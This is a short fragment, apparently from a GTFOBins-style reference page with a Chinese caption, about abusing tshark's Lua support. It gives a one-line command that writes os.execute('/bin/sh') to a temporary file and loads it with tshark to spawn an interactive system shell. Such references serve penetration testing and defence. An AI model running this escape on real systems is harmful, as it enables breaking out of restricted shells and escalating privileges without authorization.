..
/ tshark
This program is able to execute [
lua
](/gtfobins/less/) code.
shell
用来生成一个交互式的系统shell。
TF=$(mktemp) echo 'os.execute("/bin/sh")' >$TF tshark -Xlua_script:$TF